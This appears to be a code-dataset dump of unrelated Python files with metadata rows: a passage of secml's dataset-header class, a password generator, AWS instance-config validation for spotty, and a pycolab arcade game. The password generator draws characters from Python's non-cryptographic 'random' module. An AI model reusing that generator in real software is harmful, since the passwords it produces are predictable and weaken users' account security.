value : any
Value to assign to the attribute.
Could be an immutable object (scalar, tuple, dict, str),
or a vector-like CArray. Lists are automatically converted
to vector-like CArrays.
"""
# We store lists as CArrays to facilitate indexing
value = CArray(value) if is_list(value) else value
# Make sure we store arrays as vector-like
value = value.ravel() if isinstance(value, CArray) else value
super(CDatasetHeader, self).__setattr__(key, value)
# Make sure that input writable attributes are consistent
if is_writable(self, key):
self._validate_params()
def _validate_params(self):
"""Validate input attributes.
The following checks will be performed:
- all CArray must have the same size
"""
for attr_k, attr_v in self.get_params().items():
if isinstance(attr_v, CArray):
if self.num_samples is not None:
if attr_v.size != self.num_samples:
delattr(self, attr_k) # Remove faulty attribute
raise ValueError(
"`{:}` is an array of size {:}. "
"{:} expected.".format(attr_k, attr_v.size,
self.num_samples))
# Populate the protected _num_samples attribute
self._num_samples = attr_v.size
def __getitem__(self, idx):
"""Given an index, extract the header subset.
Immutable objects (scalar, string, tuple, dictionary) will be passed
as they are while indexing the header. Arrays will be indexed and the
result of indexing will be returned.
Examples
--------
>>> from secml.data import CDatasetHeader
>>> from secml.array import CArray
>>> ds_header = CDatasetHeader(id='mydataset', age=CArray([1,2,3]))
>>> h_subset = ds_header[[0, 2]]
>>> h_subset.id
'mydataset'
>>> h_subset.age
CArray(2,)(dense: [1 3])
"""
subset = dict()
for attr in self.get_params():
if isinstance(getattr(self, attr), CArray):
subset[attr] = getattr(self, attr)[idx]
else: # Pass other types (dict, scalar, str, ...) as is
subset[attr] = getattr(self, attr)
return self.__class__(**subset)
def __str__(self):
if len(self.get_params()) == 0:
return self.__class__.__name__ + "{}"
return self.__class__.__name__ + \
"{'" + "', '".join(self.get_params()) + "'}"
def append(self, header):
"""Append input header to current header.
Parameters
----------
header : CDatasetHeader
Header to append. Only attributes which are arrays are merged.
Other attributes are set if not already defined in the current
header. Otherwise, the value of the attributes in the input
header should be equal to the value of the same attribute
in the current header.
Returns
-------
CDatasetHeader
Notes
-----
Append does not occur in-place: a new header is allocated and filled.
See Also
--------
CArray.append : More information about arrays append.
Examples
--------
>>> from secml.data import CDatasetHeader
>>> from secml.array import CArray
>>> ds_header1 = CDatasetHeader(id={'a': 0, 'b': 2}, a=2, age=CArray([1,2,3]))
>>> ds_header2 = CDatasetHeader(id={'a': 0, 'b': 2}, b=4, age=CArray([1,2,3]))
>>> ds_merged = ds_header1.append(ds_header2)
>>> ds_merged.age
CArray(6,)(dense: [1 2 3 1 2 3])
>>> ds_merged.id # doctest: +SKIP
{'a': 0, 'b': 2}
>>> ds_merged.a
2
>>> ds_merged.b
4
"""
subset = dict()
for attr in header.get_params():
if hasattr(self, attr): # Attribute already in current header
if isinstance(getattr(self, attr), CArray):
subset[attr] = getattr(self, attr)\
.append(getattr(header, attr))
elif getattr(self, attr) != getattr(header, attr):
                # For non-arrays, we check equality
raise ValueError(
"value of '{:}' in input header should be equal "
"to '{:}'".format(attr, getattr(self, attr)))
else: # New attribute in input header
subset[attr] = getattr(header, attr)
# Append attributes which are not in the input header
for attr in self.get_params():
if attr not in subset:
subset[attr] = getattr(self, attr)
return self.__class__(**subset)
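# --- Hedged usage sketch (editor's addition, not part of secml) ---
# Demonstrates the size check documented in `_validate_params`: assigning an
# array attribute whose size differs from the existing ones should raise a
# ValueError. Assumes a working secml installation; names are illustrative.
if __name__ == "__main__":
    from secml.array import CArray
    header = CDatasetHeader(id="demo", scores=CArray([0.1, 0.2, 0.3]))
    try:
        header.labels = CArray([1, 2])  # size 2 != 3 -> expected to fail
    except ValueError as exc:
        print("validation failed as expected:", exc)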
| 33.018868 | 86 | 0.572143 |
4a25ae46383b446cc762a5d1f19c2cd033430dab | 1,393 | py | Python | passGen.py | y-mathur-i/Password-generator | 17489aec5caddfa0f67508c9e2554962f3fc72fc | ["MIT"] | null | null | null | passGen.py | y-mathur-i/Password-generator | 17489aec5caddfa0f67508c9e2554962f3fc72fc | ["MIT"] | null | null | null | passGen.py | y-mathur-i/Password-generator | 17489aec5caddfa0f67508c9e2554962f3fc72fc | ["MIT"] | null | null | null |
import random
import string
def passwordGen(length, num=False, strength='Weak'):
"""length of password,
num if want a number,
strength(weak,strong,very) """
lower = string.ascii_lowercase
upper = string.ascii_uppercase
digits = string.digits
letter = lower + upper
punctuation = string.punctuation
pwd = ''
if strength == 'Weak':
if num:
length -= 2
for _ in range(2):
pwd += random.choice(digits)
for _ in range(length):
pwd += random.choice(lower)
elif strength == 'Strong':
if num:
ran = random.randint(0, length//3)
length -= ran
for _ in range(ran):
pwd += random.choice(digits)
for _ in range(length):
pwd += random.choice(letter)
elif strength == 'Very Strong':
ran = random.randint(0, length//2)
if num:
length -= ran
for _ in range(ran):
pwd += random.choice(digits)
length -= ran
for _ in range(ran):
pwd += random.choice(punctuation)
for _ in range(length):
pwd += random.choice(letter)
pwd = list(pwd)
random.shuffle(pwd)
passwrd = ''.join(pwd)
return passwrd
# print(passwordGen(5, False, 'Very Strong'))
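# --- Hedged usage sketch (editor's addition) ---
# Each call draws fresh randomness, so outputs differ between runs.
if __name__ == '__main__':
    for strength in ('Weak', 'Strong', 'Very Strong'):
        print(strength, '->', passwordGen(12, num=True, strength=strength))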
| 29.020833 | 53 | 0.521895 |
4a25aedf8935ac3e72a86e9c74ca5628c3bbe484 | 4,446 | py | Python | spotty/providers/aws/config/validation.py | cyaaronk/spotty | 69adf6371fcf80c6f739616ea5ef9de0f875e434 | ["MIT"] | null | null | null | spotty/providers/aws/config/validation.py | cyaaronk/spotty | 69adf6371fcf80c6f739616ea5ef9de0f875e434 | ["MIT"] | null | null | null | spotty/providers/aws/config/validation.py | cyaaronk/spotty | 69adf6371fcf80c6f739616ea5ef9de0f875e434 | ["MIT"] | null | null | null |
from schema import Schema, Optional, And, Regex, Or, Use
from spotty.config.validation import validate_config, get_instance_parameters_schema
def validate_instance_parameters(params: dict):
from spotty.providers.aws.config.instance_config import VOLUME_TYPE_EBS
instance_parameters = {
'region': And(str, Regex(r'^[a-z0-9-]+$')),
Optional('availabilityZone', default=''): And(str, Regex(r'^[a-z0-9-]+$')),
Optional('subnetId', default=''): And(str, Regex(r'^subnet-[a-z0-9]+$')),
'instanceType': str,
Optional('onDemandInstance', default=False): bool,
Optional('amiName', default=None): And(str, len, Regex(r'^[\w\(\)\[\]\s\.\/\'@-]{3,128}$')),
Optional('amiId', default=None): And(str, len, Regex(r'^ami-[a-z0-9]+$')),
Optional('rootVolumeSize', default=0): And(Or(int, str), Use(str),
Regex(r'^\d+$', error='Incorrect value for "rootVolumeSize".'),
Use(int),
And(lambda x: x > 0,
error='"rootVolumeSize" should be greater than 0 or should '
'not be specified.'),
),
Optional('maxPrice', default=0): And(Or(float, int, str), Use(str),
Regex(r'^\d+(\.\d{1,6})?$', error='Incorrect value for "maxPrice".'),
Use(float),
And(lambda x: x > 0, error='"maxPrice" should be greater than 0 or '
'should not be specified.'),
),
Optional('managedPolicyArns', default=[]): [str],
}
volumes_checks = [
And(lambda x: len(x) < 12, error='Maximum 11 volumes are supported at the moment.'),
]
instance_checks = [
And(lambda x: not (x['onDemandInstance'] and x['maxPrice']),
error='"maxPrice" cannot be specified for on-demand instances.'),
And(lambda x: not (x['amiName'] and x['amiId']),
error='"amiName" and "amiId" parameters cannot be used together.'),
]
schema = get_instance_parameters_schema(instance_parameters, VOLUME_TYPE_EBS, instance_checks, volumes_checks)
return validate_config(schema, params)
def validate_ebs_volume_parameters(params: dict):
from spotty.providers.aws.deployment.project_resources.ebs_volume import EbsVolume
schema = Schema({
Optional('volumeName', default=''): And(str, Regex(r'^[\w-]{1,255}$')),
Optional('mountDir', default=''): str, # all the checks happened in the base configuration
Optional('size', default=0): And(int, lambda x: x > 0),
# TODO: add the "iops" parameter to support the "io1" EBS volume type
Optional('type', default='gp2'): lambda x: x in ['gp2', 'sc1', 'st1', 'standard'],
Optional('deletionPolicy', default=EbsVolume.DP_CREATE_SNAPSHOT): And(
str,
lambda x: x in [EbsVolume.DP_CREATE_SNAPSHOT,
EbsVolume.DP_UPDATE_SNAPSHOT,
EbsVolume.DP_RETAIN,
EbsVolume.DP_DELETE], error='Incorrect value for "deletionPolicy".'
),
})
return validate_config(schema, params)
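# --- Hedged illustration (editor's addition) ---
# The And/Use/Regex chaining pattern used above, shown standalone: a string
# such as '0.25' is regex-checked, converted to float, then range-checked.
def _price_schema_demo():
    price_schema = Schema(And(Or(float, int, str), Use(str),
                              Regex(r'^\d+(\.\d{1,6})?$'),
                              Use(float),
                              lambda x: x > 0))
    return price_schema.validate('0.25')  # -> 0.25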
def is_gpu_instance(instance_type: str):
# a list of GPU instance from: https://aws.amazon.com/ec2/instance-types/#Accelerated_Computing
return instance_type in [
'p2.xlarge', 'p2.8xlarge', 'p2.16xlarge',
'p3.2xlarge', 'p3.8xlarge', 'p3.16xlarge', 'p3dn.24xlarge',
'g3s.xlarge', 'g3.4xlarge', 'g3.8xlarge', 'g3.16xlarge',
]
def is_nitro_instance(instance_type):
# a list of Nitro-based instances from:
# https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-types.html#ec2-nitro-instances
nitro_prefixes = ['a1', 'c5', 'c5d', 'c5n', 'i3en', 'm5', 'm5a', 'm5ad', 'm5d', 'r5', 'r5a', 'r5ad', 'r5d',
't3', 't3a', 'z1d']
nitro_types = ['p3dn.24xlarge', 'i3.metal', 'u-6tb1.metal', 'u-9tb1.metal', 'u-12tb1.metal']
return any(instance_type.startswith(prefix + '.') for prefix in nitro_prefixes) or instance_type in nitro_types
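# --- Hedged sanity checks (editor's addition); instance names are examples ---
if __name__ == '__main__':
    assert is_gpu_instance('p3.2xlarge')
    assert not is_gpu_instance('t3.micro')
    assert is_nitro_instance('m5.large') and is_nitro_instance('i3.metal')
    assert not is_nitro_instance('p2.xlarge')
    print('helper checks passed')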
| 51.697674 | 115 | 0.552182 |
4a25afbf63b5a90156568d659f9b7fe52dfe55b0 | 11,800 | py | Python | pycolab/examples/extraterrestrial_marauders.py | simonalford42/pycolab | 2c6a6c9d4a86522ab3e2208b3e87f2eb3bb580cf | ["Apache-2.0"] | 666 | 2017-11-16T16:45:23.000Z | 2022-03-24T11:48:59.000Z | pycolab/examples/extraterrestrial_marauders.py | simonalford42/pycolab | 2c6a6c9d4a86522ab3e2208b3e87f2eb3bb580cf | ["Apache-2.0"] | 3 | 2021-09-08T03:31:49.000Z | 2022-03-12T00:59:45.000Z | rlpyt/envs/pycolab/pycolab/examples/extraterrestrial_marauders.py | williamd4112/curiosity_baselines | 45939f3f24c53cfff5153ef012486a6a058660be | ["MIT"] | 124 | 2017-11-17T15:01:17.000Z | 2022-02-03T16:52:26.000Z |
# Copyright 2017 the pycolab Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Defeat marauders from somewhere exterior to this planet.
Keys: left, right - move. space - fire. q - quit.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import curses
import numpy as np
import sys
from pycolab import ascii_art
from pycolab import human_ui
from pycolab import rendering
from pycolab import things as plab_things
from pycolab.prefab_parts import sprites as prefab_sprites
# Not shown in this ASCII art diagram are the Sprites we use for laser blasts,
# which control the characters listed in UPWARD_BOLT_CHARS and
# DOWNWARD_BOLT_CHARS below.
GAME_ART = [' X X X X X X X X ', # Row 0
' X X X X X X X X ',
' X X X X X X X X ',
' X X X X X X X X ',
' X X X X X X X X ',
' ', # Row 5
' ',
' ',
' ',
' ',
' ', # Row 10. If a Marauder
' BBBB BBBB BBBB BBBB ', # makes it to row 10,
' BBBB BBBB BBBB BBBB ', # the game is over.
' BBBB BBBB BBBB BBBB ',
' ',
' P ']
# Characters listed in UPWARD_BOLT_CHARS are used for Sprites that represent
# laser bolts that the player shoots toward Marauders. Add more characters if
# you want to be able to have more than two of these bolts in the "air" at once.
UPWARD_BOLT_CHARS = 'abcd'
# Characters listed in DOWNWARD_BOLT_CHARS are used for Sprites that represent
# laser bolts that Marauders shoot toward the player. Add more characters if you
# want more shooting from the Marauders.
DOWNWARD_BOLT_CHARS = 'yz'
# Shorthand for various points in the program:
_ALL_BOLT_CHARS = UPWARD_BOLT_CHARS + DOWNWARD_BOLT_CHARS
# To make life a bit easier for the player (and avoid the need for frame
# stacking), we use different characters to indicate the directions that the
# bolts go. If you'd like to make this game harder, you might try mapping both
# kinds of bolts to the same character.
LASER_REPAINT_MAPPING = dict(
[(b, '^') for b in UPWARD_BOLT_CHARS] +
[(b, '|') for b in DOWNWARD_BOLT_CHARS])
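# For reference (editor's note), the mapping above resolves to:
#   {'a': '^', 'b': '^', 'c': '^', 'd': '^', 'y': '|', 'z': '|'}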
# These colours are only for humans to see in the CursesUi.
COLOURS_FG = {' ': (0, 0, 0), # Space, inky blackness of.
'X': (999, 999, 999), # The Marauders.
'B': (400, 50, 30), # The bunkers.
'P': (0, 999, 0), # The player.
'^': (0, 999, 999), # Bolts from player to aliens.
'|': (0, 999, 999)} # Bolts from aliens to player.
COLOURS_BG = {'^': (0, 0, 0), # Bolts from player to aliens.
'|': (0, 0, 0)} # Bolts from aliens to player.
def make_game():
"""Builds and returns an Extraterrestrial Marauders game."""
return ascii_art.ascii_art_to_game(
GAME_ART, what_lies_beneath=' ',
sprites=dict(
[('P', PlayerSprite)] +
[(c, UpwardLaserBoltSprite) for c in UPWARD_BOLT_CHARS] +
[(c, DownwardLaserBoltSprite) for c in DOWNWARD_BOLT_CHARS]),
drapes=dict(X=MarauderDrape,
B=BunkerDrape),
update_schedule=['P', 'B', 'X'] + list(_ALL_BOLT_CHARS))
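# --- Hedged usage sketch (editor's addition, not part of the original) ---
# Steps the game headlessly for a few frames. `its_showtime`/`play` are the
# usual pycolab Engine entry points; treat this as illustrative only.
def _headless_demo(num_steps=5):
    game = make_game()
    observation, reward, discount = game.its_showtime()
    for _ in range(num_steps):
        if game.game_over:
            break
        observation, reward, discount = game.play(3)  # 3 is the no-op action
    return observation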
class BunkerDrape(plab_things.Drape):
"""A `Drape` for the bunkers at the bottom of the screen.
Bunkers are gradually eroded by laser bolts, for which the user loses one
point. Other than that, they don't really do much. If a laser bolt hits a
bunker, this Drape leaves a note about it in the Plot---the bolt's Sprite
checks this and removes itself from the board if it's present.
"""
def update(self, actions, board, layers, backdrop, things, the_plot):
# Where are the laser bolts? Bolts from players or marauders do damage.
bolts = np.logical_or.reduce([layers[c] for c in _ALL_BOLT_CHARS], axis=0)
hits = bolts & self.curtain # Any hits to a bunker?
np.logical_xor(self.curtain, hits, self.curtain) # If so, erode the bunker...
the_plot.add_reward(-np.sum(hits)) # ...and impose a penalty.
# Save the identities of bunker-striking bolts in the Plot.
the_plot['bunker_hitters'] = [chr(c) for c in board[hits]]
class MarauderDrape(plab_things.Drape):
"""A `Drape` for the marauders descending downward toward the player.
The Marauders all move in lockstep, which makes them an ideal application of
a Drape. Bits of the Drape get eroded by laser bolts from the player; each
hit earns ten points. If the Drape goes completely empty, or if any Marauder
makes it down to row 10, the game terminates.
As with `BunkerDrape`, if a laser bolt hits a Marauder, this Drape leaves a
note about it in the Plot; the bolt's Sprite checks this and removes itself
from the board if present.
"""
def __init__(self, curtain, character):
# The constructor just sets the Marauder's initial horizontal direction.
super(MarauderDrape, self).__init__(curtain, character)
self._dx = -1
def update(self, actions, board, layers, backdrop, things, the_plot):
# Where are the laser bolts? Only bolts from the player kill a Marauder.
bolts = np.logical_or.reduce([layers[c] for c in UPWARD_BOLT_CHARS], axis=0)
hits = bolts & self.curtain # Any hits to Marauders?
np.logical_xor(self.curtain, hits, self.curtain) # If so, zap the marauder...
the_plot.add_reward(np.sum(hits)*10) # ...and supply a reward.
# Save the identities of marauder-striking bolts in the Plot.
the_plot['marauder_hitters'] = [chr(c) for c in board[hits]]
# If no Marauders are left, or if any are sitting on row 10, end the game.
if (not self.curtain.any()) or self.curtain[10, :].any():
return the_plot.terminate_episode() # i.e. return None.
# We move faster if there are fewer Marauders. The odd divisor causes speed
# jumps to align on the high sides of multiples of 8; so, speed increases as
# the number of Marauders decreases to 32 (or 24 etc.), not 31 (or 23 etc.).
if the_plot.frame % max(1, np.sum(self.curtain)//8.0000001): return
# If any Marauder reaches either side of the screen, reverse horizontal
# motion and advance vertically one row.
if np.any(self.curtain[:, 0] | self.curtain[:, -1]):
self._dx = -self._dx
self.curtain[:] = np.roll(self.curtain, shift=1, axis=0)
self.curtain[:] = np.roll(self.curtain, shift=self._dx, axis=1)
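# Editor's note (hedged illustration): the lockstep movement above relies on
# `np.roll`, e.g. shifting a one-hot row left by one:
#   >>> np.roll(np.array([[False, True, False]]), shift=-1, axis=1)
#   array([[ True, False, False]])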
class PlayerSprite(prefab_sprites.MazeWalker):
"""A `Sprite` for our player.
This `Sprite` simply ties actions to going left and right. In interactive
settings, the user can also quit.
"""
def __init__(self, corner, position, character):
"""Simply indicates to the superclass that we can't walk off the board."""
super(PlayerSprite, self).__init__(
corner, position, character, impassable='', confined_to_board=True)
def update(self, actions, board, layers, backdrop, things, the_plot):
del layers, backdrop, things # Unused.
if actions == 0: # go leftward?
self._west(board, the_plot)
elif actions == 1: # go rightward?
self._east(board, the_plot)
elif actions == 4: # quit?
the_plot.terminate_episode()
class UpwardLaserBoltSprite(prefab_sprites.MazeWalker):
"""Laser bolts shot from the player toward Marauders."""
def __init__(self, corner, position, character):
"""Starts the Sprite in a hidden position off of the board."""
super(UpwardLaserBoltSprite, self).__init__(
corner, position, character, impassable='')
self._teleport((-1, -1))
def update(self, actions, board, layers, backdrop, things, the_plot):
if self.visible:
self._fly(board, layers, things, the_plot)
elif actions == 2:
self._fire(layers, things, the_plot)
def _fly(self, board, layers, things, the_plot):
"""Handles the behaviour of visible bolts flying toward Marauders."""
# Disappear if we've hit a Marauder or a bunker.
if (self.character in the_plot['bunker_hitters'] or
self.character in the_plot['marauder_hitters']):
return self._teleport((-1, -1))
# Otherwise, northward!
self._north(board, the_plot)
def _fire(self, layers, things, the_plot):
"""Launches a new bolt from the player."""
# We don't fire if the player fired another bolt just now.
if the_plot.get('last_player_shot') == the_plot.frame: return
the_plot['last_player_shot'] = the_plot.frame
# We start just above the player.
row, col = things['P'].position
self._teleport((row-1, col))
class DownwardLaserBoltSprite(prefab_sprites.MazeWalker):
"""Laser bolts shot from Marauders toward the player."""
def __init__(self, corner, position, character):
"""Starts the Sprite in a hidden position off of the board."""
super(DownwardLaserBoltSprite, self).__init__(
corner, position, character, impassable='')
self._teleport((-1, -1))
def update(self, actions, board, layers, backdrop, things, the_plot):
if self.visible:
self._fly(board, layers, things, the_plot)
else:
self._fire(layers, the_plot)
def _fly(self, board, layers, things, the_plot):
"""Handles the behaviour of visible bolts flying toward the player."""
# Disappear if we've hit a bunker.
if self.character in the_plot['bunker_hitters']:
return self._teleport((-1, -1))
# End the game if we've hit the player.
if self.position == things['P'].position: the_plot.terminate_episode()
self._south(board, the_plot)
def _fire(self, layers, the_plot):
"""Launches a new bolt from a random Marauder."""
# We don't fire if another Marauder fired a bolt just now.
if the_plot.get('last_marauder_shot') == the_plot.frame: return
the_plot['last_marauder_shot'] = the_plot.frame
# Which Marauder should fire the laser bolt?
col = np.random.choice(np.nonzero(layers['X'].sum(axis=0))[0])
row = np.nonzero(layers['X'][:, col])[0][-1] + 1
# Move ourselves just below that Marauder.
self._teleport((row, col))
def main(argv=()):
del argv # Unused.
# Build an Extraterrestrial Marauders game.
game = make_game()
# Build an ObservationCharacterRepainter that will make laser bolts of the
# same type all look identical.
repainter = rendering.ObservationCharacterRepainter(LASER_REPAINT_MAPPING)
# Make a CursesUi to play it with.
ui = human_ui.CursesUi(
keys_to_actions={curses.KEY_LEFT: 0, curses.KEY_RIGHT: 1,
' ': 2, # shoot
-1: 3, # no-op
'q': 4}, # quit
repainter=repainter, delay=300,
colour_fg=COLOURS_FG, colour_bg=COLOURS_BG)
# Let the game begin!
ui.play(game)
if __name__ == '__main__':
main(sys.argv)
| 41.549296 | 82 | 0.644576 |